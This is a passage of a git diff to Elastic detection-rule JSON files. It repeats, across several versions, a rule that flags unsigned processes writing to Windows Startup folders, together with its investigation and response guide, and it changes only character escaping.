persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json index 94ae73e7b95..63698967e34 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json index 4d3d29f08b6..9d96faf3e82 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json index 261708878cb..8fb15fcba2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events 